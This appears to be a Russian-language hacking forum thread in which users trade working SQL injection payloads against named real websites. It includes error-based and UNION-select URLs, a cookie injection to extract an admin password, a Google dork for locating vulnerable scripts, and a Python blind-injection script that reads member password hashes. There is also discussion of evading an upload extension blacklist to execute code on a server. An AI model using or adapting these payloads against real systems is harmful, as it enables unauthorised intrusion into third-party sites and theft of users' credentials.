http://www.liftnn.ru/page.php?path=0.25 там точка используется для разбиения переданного параметра, поэтому второй запрос и не работает http://www.liftnn.ru/page.php?path=3)+or+1+group+by+concat((select+123+from+pages+limit+0,1),floor(rand(0)*2))having+min(0)+or+1%23 работает http://www.liftnn.ru/page.php?path=3)+or+1+group+by+concat((select+123+from+sttsnn_lift2.pages+limit+0,1),floor(rand(0)*2))having+min(0)+or+1%23 не работает, т.к. точкой разбили запрос бруть таблицы либо ищи способ обойтись без точки
Бывают 2 вида скуль инъекции это обычные и слепые, но все они находятся по разному, киньте ссылки на статьи к способам их нахождения.
SQL injection полный FAQ [Dr.Z3r0] SQL инъекция (в т.ч. и blind SQL) [kot777] Быстрый Blind SQL Injection [Qwazar] А поиск для чего??
есть уязвимый сервер, могу заливать все типы файлов кроме: $Config['DeniedExtensions']['File'] = array('php','asp','aspx','ascx','jsp','cfm','cfc','pl','bat','exe','dll','reg') ; пробовал php3, phtml, xinc, различные комбинации по типу php.jpg, не выполняются, а скачиваются сервер под nginx, поэтому htaccess не пойдет lfi не нашел что можно еще поробовать?
кусок уязвимого кода структура таблицы чему должна быть равна переменная $lole для вывода password where username admin?
Должно быть mq = off; Попробуй Cookie: UsNick = ' union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8 from tb_users where username='admin'-- 1 Скинь ссылку в пм. Догадываюсь что за движок (bux какой-то).
inurl:advertisewmz.php уязвимый сценарий referals.php, он в той же папке спасибо за ответ, попробую завтра принтабельные цифры будут 2,9?
какето? http://uzmob.uz/profile.php?mode=viewprofile&u=692' Could not update user data. DEBUG MODE SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 3 UPDATE phpbb_users SET user_profile_view = '1' WHERE user_id = Line : 27 File : usercp_viewprofile.php
Не могу запустить сплойт. Code: #!/usr/bin/python #-*- coding: utf-8 -*- # coded by BlueH4G _http://blueh4g.org_ import urllib,re from time import sleep def main() : chk = re.compile("true_title") url_begin=" http://t.blueh4g.org/technote7/board.php?board=freeboard&sort=(case%20(" url_end=")%20when%20true%20then%20no%20else%20uid%20end)%20asc%20limit%200,1%23" result="result : " for spos in range(1,14): ch=0 for i in range(1,8) : sleep(0.05) query="select%20substr((select%20lpad(bin(ascii(substr(m_pass,"+str(spos)+",1))),7,0)%20from%20a_tn3_memberboard_list%20order%20by%20m_level%20desc%20limit%200,1),"+str(i)+",1)=1 data=urllib.urlopen(url_begin + query + url_end) text=data.read() if chk.search(text) : ch += 2**(7-i) result+=chr(ch) print result main() C:\Python27>root.py File "C:\Python27\root.py", line 9 url_begin=" ^ SyntaxError: EOL while scanning string literal
привет, дружище) расскажи в общих словах почему ты даже не удосужился поискать в поисковой системе google по коду ошибки? На твой взгляд что значит аббревиатура EOL?
Как это раскрутить http://www.onradio.gr/play_old.php?id=245+union+AlL+sElEcT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33
Error Based же: http://www.onradio.gr/play_old.php?id=245%20or%201%20group%20by%20concat(version(),floor(rand(0)*2))%20having%20min(0)%20or%201%20--%20-
в чём проблема? Code: http://www.onradio.gr/play_old.php?id=-245+union+select+1,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+--+
